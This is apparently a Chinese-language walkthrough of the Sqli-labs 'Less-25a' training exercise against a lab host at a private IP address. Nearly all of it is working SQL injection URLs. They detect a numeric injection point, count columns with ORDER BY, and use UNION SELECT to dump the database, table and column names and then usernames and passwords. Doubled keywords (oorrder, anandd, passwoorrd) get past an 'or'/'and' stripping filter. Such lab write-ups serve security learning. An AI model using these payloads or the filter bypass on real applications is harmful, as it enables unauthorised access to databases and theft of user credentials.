Sqli-labs less-25a
判断注入类型,列数及注入点
构造
http://192.168.140.130/sq/Less-25a/?id=1
回显正常
http://192.168.140.130/sq/Less-25a/?id=1’
报错
构造
http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
回显正常
http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
报错
确定为数字型注入
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 1
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 2
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 3
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 4
4的时候报错,确定列数为3
构造
http://192.168.140.130/sq/Less-25a/?id=0 union select 1,2,3
确定注入点2,3
爆数据
数据库名
http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select database()),3
表名
http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3
注意informatrion中or字符的绕过
列名
http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name=‘users’),3
注意or与and字符绕过
数据
http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(username,‘~’,passwoorrd) from security.users),3
==注意password字符中or的绕过
*** OVER!***